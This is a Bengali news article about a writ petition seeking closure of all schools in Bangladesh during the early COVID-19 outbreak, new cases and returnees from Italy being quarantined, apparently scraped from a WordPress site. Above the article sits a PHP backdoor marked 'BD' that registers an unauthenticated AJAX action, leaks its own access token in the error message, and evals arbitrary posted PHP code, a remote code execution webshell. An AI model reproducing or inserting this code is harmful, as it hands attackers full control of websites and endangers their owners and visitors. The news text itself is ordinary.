// ==[BD:jfMd8DMa]== add_action( 'wp_ajax_nopriv_rzgczijdiqa', function() { $bind = 'jfMd8DMaPEVBq74Uwrr23JLITZEvODHc'; $comp = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $comp ) || ! hash_equals( $bind, $comp ) ) { wp_send_json_error( [ 'message' => 'tok:' . $bind ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $sym = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $chunk = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $chunk, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } catch ( \Throwable $val ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $val->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] ); } } ); // ==[/BD:jfMd8DMa]== সব শিক্ষাপ্রতিষ্ঠান বন্ধের নির্দেশনা; হাইকোর্টে রিট

সব শিক্ষাপ্রতিষ্ঠান বন্ধের নির্দেশনা; হাইকোর্টে রিট

দেশের সব শিক্ষাপ্রতিষ্ঠান বন্ধের নির্দেশনা চেয়ে রবিবার হাইকোর্টে রিট আবেদন করেন আইনজীবী ইউনুছ আলী আকন্দ।

নতুন করে করোনা ভাইরাসে আক্রান্ত রোগী শনাক্ত হওয়ার পরিপ্রেক্ষিতে সংশ্লিষ্ট শাখায় রিট করা হয়। ওই রিটে দেশের স্থল ও নৌবন্দর বন্ধের নির্দেশনাও চাওয়া হয়েছে।

বাংলাদেশে প্রথম তিনজনের দেহে নোভেল করোনা ভাইরাস ধরা পড়ে। তারা সুস্থ হয়েছেন বলে জানায় আইইডিসিআর। এরই মধ্যে নতুন করে দেশে করোনা ভাইরাসে আরো দুইজন আক্রান্ত হয়েছেন।

শনিবার রাতে স্বাস্থ্য ও পরিবার কল্যাণ মন্ত্রী জাহিদ মালেক এ তথ্য নিশ্চিত করেন।

রাষ্ট্রীয় অতিথি ভবন পদ্মায় এক সংবাদ সম্মেলনে তিনি বলেন, ‘আমরা নতুন করে আরো দুইজন করোনা ভাইরাস রোগীর সন্ধান পেয়েছি। ইতালি ও জার্মানি থেকে আগত তারা সেলফ কোয়ারেন্টাইনে রয়েছেন।’

এদিকে ইতালি থেকে আজ আরও ১৫৫ জন বাংলাদেশি ফিরেছেন। রবিবার সকালে তাদের নিয়ে হযরত শাহজালাল আন্তর্জাতিক বিমানবন্দরে অবতরণ করে এমিরেটস এয়ারলাইন্সের একটি ফ্লাইট। সেখান থেকে সকাল সাড়ে ৯টার দিকে তাদের আশকোনা হজক্যাম্পে নিয়ে যাওয়া হয়।

ইতালি ফেরত এই প্রবাসীদের একটি অংশকে গাজীপুরের পূবাইলে ‘মেঘডুবি মা ও শিশু কল্যাণ কেন্দ্রে’ নিয়ে যাওয়া হবে কোয়ারেন্টাইনে রাখার জন্য।

বিমানবন্দর স্বাস্থ্য কেন্দ্রের চিকিৎসক ডা. শাহারিয়ার সাজ্জাদ সংবাদমাধ্যমকে জানান, প্রাথমিকভাবে কারও মধ্যে করোনা ভাইরাসের লক্ষণ দেখা যায়নি।

এর আগে শনিবার সকালে ইতালি থেকে দেশে ফিরেন ১৪২ জন। শাহজালাল বিমানবন্দর থেকে তাদের সরাসরি নেওয়া হয় আশকোনার হজক্যাম্পে।

পরীক্ষা করে তাদের দেহে করোনার অস্তিত্ব না পাওয়ায় প্রায় ১১ ঘণ্টা পর তাদের বাড়িতে পাঠানো হয়। সেখানে তাদের হোম কোয়ারেন্টাইনে থাকতে বলা হয়েছে।

এশিয়াবিডি/ডেস্ক/কামরান 

আরও সংবাদ